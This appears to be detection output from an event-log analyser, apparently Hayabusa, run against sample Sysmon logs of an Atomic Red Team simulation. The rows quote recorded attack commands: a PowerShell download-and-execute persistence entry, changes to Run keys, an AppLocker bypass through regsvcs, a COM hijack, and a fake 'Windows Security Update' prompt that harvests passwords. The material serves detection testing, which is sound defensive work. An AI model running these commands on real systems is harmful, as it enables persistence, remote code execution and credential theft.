Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 
23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via 
Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.767 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.775 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.787 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.802 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.817 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.824 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.830 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.841 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.858 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
